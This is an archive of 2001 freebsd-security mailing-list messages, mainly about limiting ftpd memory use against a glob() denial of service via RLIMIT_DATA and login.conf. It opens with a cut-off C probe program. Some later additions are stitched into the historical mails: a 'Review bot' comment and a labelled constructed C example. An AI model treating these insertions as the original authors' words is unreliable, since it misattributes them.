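    return refused;
}

/* Run the probe under a temporary datasize limit, then restore the old one. */
unsigned probe_under_data_limit(rlim_t kbytes, size_t bytes)
{
    struct rlimit saved;
    if (apply_data_limit(kbytes, &saved) != 0)
        return 0;
    unsigned refused = probe_allocation_paths(bytes);
    setrlimit(RLIMIT_DATA, &saved);     /* raising the soft limit back is allowed */
    return refused;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s datasize-kbytes [command [args...]]\n", argv[0]);
        return 2;
    }
    rlim_t kbytes = (rlim_t)strtoull(argv[1], NULL, 10);

    if (argc > 2) {
        /* Wrapper mode: apply the limit and exec the real daemon.  argv is
         * handed over intact, so arguments containing spaces survive. */
        if (apply_data_limit(kbytes, NULL) != 0) {
            perror("setrlimit");
            return 1;
        }
        execvp(argv[2], argv + 2);
        perror("execvp");
        return 1;
    }

    unsigned r = probe_under_data_limit(kbytes, (size_t)64 << 20);
    printf("datasize %llu KB: sbrk(64 MiB) %s, mmap(64 MiB) %s\n",
           (unsigned long long)kbytes,
           (r & PROBE_SBRK_REFUSED) ? "refused" : "allowed",
           (r & PROBE_MMAP_REFUSED) ? "refused" : "allowed");
    return 0;
}
```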


From owner-freebsd-security  Fri Mar 16 17:28:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4])
	by hub.freebsd.org (Postfix) with ESMTP id 662C437B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 17:28:08 -0800 (PST)
	(envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost)
	by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2H1Rfj30921;
	Fri, 16 Mar 2001 20:27:41 -0500 (EST)
	(envelope-from rsimmons@wlcg.com)
Date: Fri, 16 Mar 2001 20:27:37 -0500 (EST)
From: Rob Simmons <rsimmons@wlcg.com>
To: Anil Jangity <aj@entic.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
Message-ID: <Pine.BSF.4.33.0103162026510.30661-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

You can change the user that ftpd runs as in inetd.conf.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 16 Mar 2001, Anil Jangity wrote:

> Kris/All,
>
> FTPD is run as root (at least on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ball park figure for
> root would be...
>
> I looked in ftpd(8) for some way to make it run as another user (at least
> after it starts up) but no luck.
>
> So, my question is, how do you propose we resource limit ftpd as you
> suggest via login.conf?
>
> Thanks
>
> Anil
>
> @ I'm pretty sure (but haven't tested) that resource limits will prevent
> @ this problem.  Your ftpd shouldn't be using large amount of memory
> @ under normal operating procedures, so you can set those to reasonable
> @ values and not suffer any ill effects.
> @
> @ Kris
> @
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>





From owner-freebsd-security  Fri Mar 16 18: 6:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from imo-m06.mx.aol.com (imo-m06.mx.aol.com [64.12.136.161])
	by hub.freebsd.org (Postfix) with ESMTP id D780637B71A
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 18:06:49 -0800 (PST)
	(envelope-from aykatsue@netscape.net)
Received: from aykatsue@netscape.net
	by imo-m06.mx.aol.com (mail_out_v29.5.) id n.ef.110874e (16226)
	 for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 21:06:42 -0500 (EST)
Received: from  netscape.com (aimmail10.aim.aol.com [205.188.144.202]) by air-in02.mx.aol.com (v77_r1.21) with ESMTP; Fri, 16 Mar 2001 21:06:42 -0500
Date: Fri, 16 Mar 2001 21:07:10 -0500
From: aykatsue@netscape.net (Eric Estrella)
To: FreeBSD-security@freebsd.org
Subject: subscribe
Mime-Version: 1.0
Message-ID: <592F8E49.1A2894FF.0096C8D3@netscape.net>
X-Mailer: Franklin Webmailer 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org





From owner-freebsd-security  Fri Mar 16 19:16:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20])
	by hub.freebsd.org (Postfix) with SMTP id 4BE9B37B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 19:16:13 -0800 (PST)
	(envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 10588 invoked by uid 0); 17 Mar 2001 03:16:11 -0000
Received: from pd950868c.dip.t-dialin.net (HELO speedy.gsinet) (217.80.134.140)
  by mail.gmx.net (mp020-rz3) with SMTP; 17 Mar 2001 03:16:11 -0000
Received: (from sittig@localhost)
	by speedy.gsinet (8.8.8/8.8.8) id VAA28585
	for freebsd-security@FreeBSD.ORG; Fri, 16 Mar 2001 21:37:16 +0100
Date: Fri, 16 Mar 2001 21:37:16 +0100
From: Gerhard Sittig <Gerhard.Sittig@gmx.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316213716.D20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net> <Pine.BSF.4.33.0103161922120.9463-100000@husten.security.at12.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <Pine.BSF.4.33.0103161922120.9463-100000@husten.security.at12.de>; from pherman@frenchfries.net on Fri, Mar 16, 2001 at 07:34:22PM +0100
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 19:34 +0100, Paul Herman wrote:
> 
> Too bad a setusercontext() call couldn't be easily implemented
> inside of set[e]uid() (it's in -lutil not -lc).  I see too many
> FreeBSD admins that believe that their proftpds and qmails are
> protected by the limits set in /etc/login.conf.

Well, the latter is recommended to be wrapped up in a
softlimit(1) invocation.  And the former - as well as any other
program - could be treated the same.

If login.conf isn't easily applied one is still free to make use
of ports/sysutils/daemontools.


virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.



From owner-freebsd-security  Fri Mar 16 23: 6:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222])
	by hub.freebsd.org (Postfix) with ESMTP id 0C9EB37B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 23:06:50 -0800 (PST)
	(envelope-from docs@mailer.progressive-comp.com)
Received: (from docs@localhost)
	by mailer.progressive-comp.com with id CAA08229; Sat, 17 Mar 2001 02:06:06 -0500
Date: Sat, 17 Mar 2001 02:06:06 -0500
Message-Id: <200103170706.CAA08229@mailer.progressive-comp.com>
From: Hank Leininger <freebsd-security@progressive-comp.com>
Reply-To: Hank Leininger <hlein@progressive-comp.com>
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
X-Shameless-Plug: Check out http://marc.theaimsgroup.com/
X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com
X-Warning: Report any violation of list policy to abuse@progressive-comp.com
X-Posted-By: Hank Leininger <hlein@progressive-comp.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2001-03-16, Kris Kennaway <kris@obsecurity.org> wrote:

> Always be careful trusting the results of automated scanners, because
> they can never contain a database of ALL known vulnerabilities, so
> your system may have other problems than what's noted there.  It may
> be useful as a backup to make sure you haven't missed anything,
> though.

[ I know Kris knows this, just pointing it out... ]

s/known//;

In particular, as other people have pointed out, if you have any reason to
think a box *might* have been compromised, it's not worth your time (if
your goal is to get on with life) to do anything but assume it *has* been
compromised, and start over.  There are too many creative ways that an
attacker could have trojan'ed the box once they had free rein for you to
ever[*] be sure you've been thorough enough in checking the box out.  Once
a box falls out of a known-good state, it can't really be put back without
starting over, or taking a big chance...

[*] A thorough forensic analysis could tell you that the box definitely has
been, or probably has not been, compromised.  The level of certainty that
it hasn't been that you can achieve is directly proportional to how much
time (or money) you have to spend on the investigation.  Sounds like you
have little of either, and don't feel like becoming a forensic expert for
the hell of it, so I'd suggest not trying to "prove" to yourself or anyone
else that the box(es) are safe, and just replace them/do the rolling
rebuilds as have been suggested here.  Don't forget to take advantage of
this opportunity to remind management how much time and money, in the long
run, a proactive approach can save. :-P

--
Hank Leininger <hlein@progressive-comp.com> 
I say we take off, nuke the site from orbit.  Only way to be sure.



From owner-freebsd-security  Sat Mar 17  2:40:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
	by hub.freebsd.org (Postfix) with ESMTP id ADB0A37B719
	for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 02:40:53 -0800 (PST)
	(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-195-14-235-121.netcologne.de [195.14.235.121])
	by mr200.netcologne.de (Mirapoint)
	with ESMTP id ACQ21835;
	Sat, 17 Mar 2001 11:40:45 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
	by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2HAebK56557;
	Sat, 17 Mar 2001 11:40:37 +0100 (CET)
	(envelope-from pherman@frenchfries.net)
Date: Sat, 17 Mar 2001 11:40:36 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: Gerhard Sittig <Gerhard.Sittig@gmx.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316213716.D20830@speedy.gsinet>
Message-ID: <Pine.BSF.4.33.0103170911190.10083-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 16 Mar 2001, Gerhard Sittig wrote:

> > Too bad a setusercontext() call couldn't be easily implemented
> > inside of set[e]uid() (it's in -lutil not -lc).  I see too many
> > FreeBSD admins that believe that their proftpds and qmails are
> > protected by the limits set in /etc/login.conf.
>
> Well, the latter is recommended to be wrapped up in a
> softlimit(1) invocation.  And the former - as well as any other
> program - could be treated the same.
>
> If login.conf isn't easily applied one is still free to make use
> of ports/sysutils/daemontools.

Yes, there are many solutions, most of which have already been posted.
Thing is, even if you created ports/sysutils/cluestick, many admins
would still intuitively believe that limits imposed by /etc/login.conf
apply to all processes.

The reality that only a select few daemons use /etc/login.conf is
admittedly counter-intuitive.  Perhaps this is more of a job for
TrustedBSD's MAC policies, but it Would Be Nice if resource limits
were set along with (e)uid.  What do others think?

Like I said, this could be done by wrapping setusercontext() into
setuid(), but it starts to get yucky when mixing userland login_cap
functions with a system call.  I'd be willing to come up with a patch
for this, if it weren't so darn ugly.

Would there be a cleaner way to do this?

-Paul.




From owner-freebsd-security  Sat Mar 17  3: 6: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id 6DF1237B718
	for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 03:05:58 -0800 (PST)
	(envelope-from roam@ringworld.nanolink.com)
Received: (qmail 22363 invoked by uid 1000); 17 Mar 2001 11:05:15 -0000
Date: Sat, 17 Mar 2001 13:05:15 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Matt Dillon <dillon@earth.backplane.com>
Cc: Paul Herman <pherman@frenchfries.net>,
	"ho-sang, yoon" <tsoi@xocah.holywar.net>,
	freebsd-security@FreeBSD.ORG, Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010317130515.A20798@ringworld.oblivion.bg>
Mail-Followup-To: Matt Dillon <dillon@earth.backplane.com>,
	Paul Herman <pherman@frenchfries.net>,
	"ho-sang, yoon" <tsoi@xocah.holywar.net>,
	freebsd-security@FreeBSD.ORG, Kris Kennaway <kris@obsecurity.org>
References: <Pine.BSF.4.33.0103162158140.10083-100000@husten.security.at12.de> <200103162116.f2GLGm674347@earth.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103162116.f2GLGm674347@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Mar 16, 2001 at 01:16:48PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 01:16:48PM -0800, Matt Dillon wrote:
> :>
> :> I don't think that the resource limit has an effect on this matter.
> :> Or am I wrong about something?
> :
> :I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
> :kicked in, but it didn't.  However, what does work is setting the
> :"datasize"  (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
> :RLIMIT_DATA.
> :
> :Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
> :I'm perusing through sys/vm now...
> :
> :-Paul.
> 
>     The 'datasize' limit (RLIMIT_DATA) only applies to malloc().  It does
>     not apply to mmap().  This is a known issue.  In any case, it would depend
>     on what ftpd uses.  I would expect ftpd to use malloc() for internal
>     structures and perhaps mmap() (or sendfile()) when reading a file.
> 
>     The 'memoryuse' limit (RLIMIT_RSS) only applies to the process's
>     in-core size.  If the process exceeds this value and the machine is 
>     loaded down, the kernel will attempt to swap pages out to get the
>     process back within the limit.  If the machine is mostly idle, the
>     kernel ignores this limit.
> 
>     Currently we have no resource to limit mmap() use.

I think in this case it's important to limit exactly malloc(), and
definitely NOT mmap().  It's glob(3) that's causing this particular
DoS, and it (or, in particular, lib/libc/gen/glob.c's globextend())
uses malloc().  We definitely do not want to limit the maximum filesize
that ftpd can transfer - which uses sendfile(); I do not know where
sendfile() gets its limits from, but being a syscall, it should
not be dependent on RLIMIT_DATA. (well, OK, you probably know what I mean :)

G'luck,
Peter

-- 
This sentence no verb.



From owner-freebsd-security  Sat Mar 17  5:44:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128])
	by hub.freebsd.org (Postfix) with ESMTP id F1A7437B71A
	for <freebsd-security@freebsd.org>; Sat, 17 Mar 2001 05:44:24 -0800 (PST)
	(envelope-from snow@teardrop.org)
Received: (from snow@localhost)
	by silver.teardrop.org (8.11.2/8.11.1) id f2HDiLd72890;
	Sat, 17 Mar 2001 08:44:21 -0500 (EST)
	(envelope-from snow@teardrop.org)
Date: Sat, 17 Mar 2001 08:44:21 -0500
From: James Snow <snow@teardrop.org>
To: Peter Pentchev <roam@orbitel.bg>, freebsd-security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010317084421.A72802@teardrop.org>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316203238.A8245@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:32:38PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote:
> 
> I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
> committed a similar fix earlier today :)

Cool. Although, I haven't seen it show up in my source tree yet. 

Do you know what the fix was?


-Snow



From owner-freebsd-security  Sat Mar 17  6:12:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id 9238937B719
	for <freebsd-security@freebsd.org>; Sat, 17 Mar 2001 06:12:30 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 86420 invoked by uid 1000); 17 Mar 2001 14:11:24 -0000
Date: Sat, 17 Mar 2001 16:11:23 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: James Snow <snow@teardrop.org>
Cc: freebsd-security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010317161122.B20798@ringworld.oblivion.bg>
Mail-Followup-To: James Snow <snow@teardrop.org>,
	freebsd-security@freebsd.org
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg> <20010317084421.A72802@teardrop.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010317084421.A72802@teardrop.org>; from snow@teardrop.org on Sat, Mar 17, 2001 at 08:44:21AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Mar 17, 2001 at 08:44:21AM -0500, James Snow wrote:
> On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote:
> > 
> > I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
> > committed a similar fix earlier today :)
> 
> Cool. Although, I haven't seen it show up in my source tree yet. 
> 
> Do you know what the fix was?

It has still not shown up in -stable.  -current has the fix:

http://www.FreeBSD.org/cgi/cvsweb.cgi/src/crypto/openssh/auth2.c

Take a look at rev. 1.10.

G'luck,
Peter

-- 
No language can express every thought unambiguously, least of all this one.



From owner-freebsd-security  Sat Mar 17  8:21:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id 23D9937B718
	for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 08:21:14 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id RAA73701;
	Sat, 17 Mar 2001 17:21:12 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: Per Christian Henden <perchrh@stud.math.ntnu.no>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: weird error messages (at least I don't understand them)
References: <Pine.GSO.4.33.0103161022470.28592-100000@lastebil.math.ntnu.no>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 17 Mar 2001 17:21:11 +0100
In-Reply-To: Per Christian Henden's message of "Fri, 16 Mar 2001 10:34:41 +0100 (MET)"
Message-ID: <xzphf0scqo8.fsf@flood.ping.uio.no>
Lines: 24
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Per Christian Henden <perchrh@stud.math.ntnu.no> writes:
> These entries (or something similar) also appear fairly frequently
> (I replaced my real dns-name with "my.hostname.domain")
> 
> Checking for rejected mail hosts:
>    5 malvix.hist.no
>    2 my.hostname.domain
>    2 malvix.hist.no@my.hostname.domain
>    1 <malvix.hist.no!kan2na
>    1 <kan2na@
>    1 <kan2na%malvix.hist.no
>    1 <kan2na
>    1 <@myhostname.domain:kan2na@malvix.hist.no
> 
> This looks kinda suspicious to me, what could it mean?

It means malvix.hist.no is looking for an open relay to spam through.
If I were you, I'd check /var/log/maillog* for occurrences of
'malvix', and send those to abuse@hist.no (or ask the admins at NTNU
if they know who's in charge of HIST)

DES
-- 
Dag-Erling Smorgrav - des@ofug.org



From owner-freebsd-security  Sat Mar 17 12:16:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20])
	by hub.freebsd.org (Postfix) with SMTP id A817937B718
	for <freebsd-security@FreeBSD.ORG>; Sat, 17 Mar 2001 12:16:00 -0800 (PST)
	(envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 8013 invoked by uid 0); 17 Mar 2001 20:15:59 -0000
Received: from pd950883e.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.62)
  by mail.gmx.net (mail05) with SMTP; 17 Mar 2001 20:15:59 -0000
Received: (from sittig@localhost)
	by speedy.gsinet (8.8.8/8.8.8) id RAA30352
	for freebsd-security@FreeBSD.ORG; Sat, 17 Mar 2001 17:46:41 +0100
Date: Sat, 17 Mar 2001 17:46:41 +0100
From: Gerhard Sittig <Gerhard.Sittig@gmx.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010317174640.F20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <20010316213716.D20830@speedy.gsinet> <Pine.BSF.4.33.0103170911190.10083-100000@husten.security.at12.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <Pine.BSF.4.33.0103170911190.10083-100000@husten.security.at12.de>; from pherman@frenchfries.net on Sat, Mar 17, 2001 at 11:40:36AM +0100
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Mar 17, 2001 at 11:40 +0100, Paul Herman wrote:
> 
> The reality that only a select few daemons use /etc/login.conf
> is admittedly counter-intuitive.  Perhaps this is more of a job
> for TrustedBSD's MAC policies, but it Would Be Nice if resource
> limits were set along with (e)uid.  What do others think?
> 
> Like I said, this could be done by wrapping setusercontext()
> into setuid(), but it starts to get yucky when mixing userland
> login_cap functions with a system call.  I'd be willing to come
> up with a patch for this, if it weren't so darn ugly.
> 
> Would there be a cleaner way to do this?

Until there's an agreed upon and clean solution, would a comment
at the top of /etc/login.conf raise attention?  Maybe with
additional pointers to alternative solutions (wrapper scripts
with ulimit(builtin) and softlimit(1), accompanying setrlimit(2)
calls next to setuid(2) calls)?

--- login.conf  2001/03/17 16:39:33     1.1
+++ login.conf  2001/03/17 16:40:55
@@ -6,6 +6,8 @@
 #
 # This file controls resource limits, accounting limits and
 # default user environment settings.
+# Keep in mind that settings might not always be obeyed
+# when daemons change their identity by means of setuid(2) et al.
 #
 # $FreeBSD: src/etc/login.conf,v 1.34.2.2 2000/06/02 20:53:55 alfred Exp $
 #
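Review bot: "might not always be obeyed" in the added comment undersells the problem and will leave the admins Paul describes still guessing. As the thread established, setuid(2) never applies these settings; only programs that go through setusercontext(3) (login(1) and the select few daemons that use login.conf) do, so say so outright, e.g. "# These limits are applied only by programs that call setusercontext(3); a daemon that merely calls setuid(2) is not covered. Use setrlimit(2), a ulimit wrapper or softlimit(1) for those." That also puts the pointers to alternative solutions you mention in the mail into the file where they will actually be read.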


virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

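An added example (not code from either mail, nor FreeBSD's own) of what Gerhard's last suggestion and Peter's RLIMIT_DATA remark amount to in practice: a daemon sets its own limit with setrlimit(2) before calling setuid(2), because neither call consults login.conf. The helper names, the 16 MB limit, the 64 MB probe and the uid 65534 target are constructed for the illustration.

```c
#define _DEFAULT_SOURCE 1   /* glibc: declare setgroups() in <grp.h> */
#include <sys/types.h>
#include <sys/resource.h>
#include <unistd.h>
#include <grp.h>
#include <stdlib.h>
#include <stdio.h>

/* Soft-limit the data segment.  Per the thread, RLIMIT_DATA is the limit that
 * bounds malloc(3), which is what glob(3) uses, while RLIMIT_RSS is only a hint
 * to the pager.  Returns 0 on success, -1 with errno set otherwise. */
int apply_data_limit(rlim_t bytes)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_DATA, &rl) != 0)
        return -1;
    /* An unprivileged process may lower the soft limit but not raise the hard one. */
    if (rl.rlim_max != RLIM_INFINITY && bytes > rl.rlim_max)
        bytes = rl.rlim_max;
    rl.rlim_cur = bytes;
    return setrlimit(RLIMIT_DATA, &rl);
}

/* Current soft limit, so a daemon can log what it actually runs under. */
rlim_t current_data_limit(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_DATA, &rl) != 0)
        return 0;
    return rl.rlim_cur;
}

/* Drop root to uid/gid.  setuid(2) does not touch resource limits, so the
 * limit applied above is inherited as-is; login.conf is never consulted,
 * which is exactly the point Paul raised.  Returns 0 on success. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (setgroups(1, &gid) != 0)          /* clear supplementary groups first */
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (uid != 0 && setuid(0) == 0)       /* sanity check: root must be gone for good */
        return -1;
    return 0;
}

/* Returns 1 if malloc(bytes) is refused under the current RLIMIT_DATA, 0 if it succeeds. */
int allocation_refused(size_t bytes)
{
    void *p = malloc(bytes);
    if (p == NULL)
        return 1;
    free(p);
    return 0;
}

int main(void)
{
    const rlim_t limit = (rlim_t)16u << 20;  /* constructed: 16 MB soft limit */
    const size_t probe = (size_t)64u << 20;  /* constructed: 64 MB request */

    printf("before limit: 64 MB malloc %s\n",
           allocation_refused(probe) ? "refused" : "succeeded");
    if (apply_data_limit(limit) != 0) {
        perror("setrlimit");
        return 1;
    }
    printf("RLIMIT_DATA soft limit now %llu bytes\n",
           (unsigned long long)current_data_limit());
    /* Only meaningful when started as root; 65534 is "nobody" on most systems. */
    if (geteuid() == 0 && drop_privileges(65534, 65534) != 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("after limit:  64 MB malloc %s\n",
           allocation_refused(probe) ? "refused" : "succeeded");
    return 0;
}
```

On a kernel that enforces RLIMIT_DATA on anonymous memory (FreeBSD, and Linux since 4.7) the second probe is refused; the limit survives the identity change untouched.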


From owner-freebsd-security  Sat Mar 17 16: 7:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp02.teb1.iconnet.net (smtp02.teb1.iconnet.net [209.3.218.43])
	by hub.freebsd.org (Postfix) with ESMTP
	id 8CFED37B718; Sat, 17 Mar 2001 16:07:27 -0800 (PST)
	(envelope-from babkin@bellatlantic.net)
Received: from bellatlantic.net (client-151-198-135-1.nnj.dialup.bellatlantic.net [151.198.135.1])
	by smtp02.teb1.iconnet.net (8.9.1/8.9.1) with ESMTP id TAA20966;
	Sat, 17 Mar 2001 19:07:24 -0500 (EST)
Message-ID: <3AB3FC38.94711FFF@bellatlantic.net>
Date: Sat, 17 Mar 2001 19:07:20 -0500
From: Sergey Babkin <babkin@bellatlantic.net>
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-19990626-CURRENT i386)
X-Accept-Language: en, ru
MIME-Version: 1.0
To: security@freebsd.org, Wes Peters <wes@softweyr.com>,
	Robert Watson <rwatson@freebsd.org>, fs@freebsd.org
Subject: about common group & user ID space (PR kern/14584)
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

All,

I want to commit PR kern/14584. I've been told that it's good
to discuss it in -arch, -security and -fs. (It has been sort of
discussed on -hackers already; there were not many replies.)
So I've posted a message on -arch, and now on -security and -fs.
I've also discussed this idea briefly with Kirk McKusick at
Usenix-2000 at the BSD BOF and he generally liked it and suggested
reviewing it further.

There is a rather long description in the PR. In short, the idea
is that all the IDs above some value get shared by both users
and groups. That is, not only can two users not have the same ID
(unless they are just aliases like root and toor) and two
groups not have the same ID, but a user and a group can't
have the same ID either. This allows the UID field in the inodes
to be used to give permissions in the unified UID&GID space,
and thus give two groups (say, "writers" and "readers") different
permissions to the file without resorting to trickery with
subdirectories. The ID space below this value is kept separate
for UIDs and GIDs for compatibility with the historic IDs.

In the patch this feature is enabled by a kernel compilation option,
plus even with this option compiled a sysctl has to be set. So
it would not affect the unsuspecting users.

Why not leave it to the real ACLs?

The problem I see with ACLs is that they break all the standard
Unix commands dealing with displaying or storing the permissions, 
such as ls, tar, cpio and others of this sort. 

Probably the ACLs are _the_ way to go for the high-security 
environments.

But from my personal experience with systems administration of
HP-UX and NetWare in not-so-high-security environments, the careless
application of ACLs tends to cause quite a systems administration 
nightmare. So I personally would avoid them for as long as possible
and use them only when really necessary.

And that seems to be not only my experience. For example, in 
UnixWare the ACLs were implemented and then essentially scrapped 
(never ported to VxFS and left working only as remnants in SFS, 
a version of FFS with ACLs which does not seem to be used by anyone 
any more and which may not be used as a root filesystem any more).

This is the reason why I think that the classic Unix permissions
still have a long life ahead, so some backwards-compatible extensions
to them might be quite usable. 

Any comments are welcome.

-SB



From owner-freebsd-security  Sat Mar 17 22:32:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp23.singnet.com.sg (smtp23.singnet.com.sg [165.21.101.203])
	by hub.freebsd.org (Postfix) with ESMTP id DE7EE37B718
	for <freebsd-security@freebsd.org>; Sat, 17 Mar 2001 22:32:12 -0800 (PST)
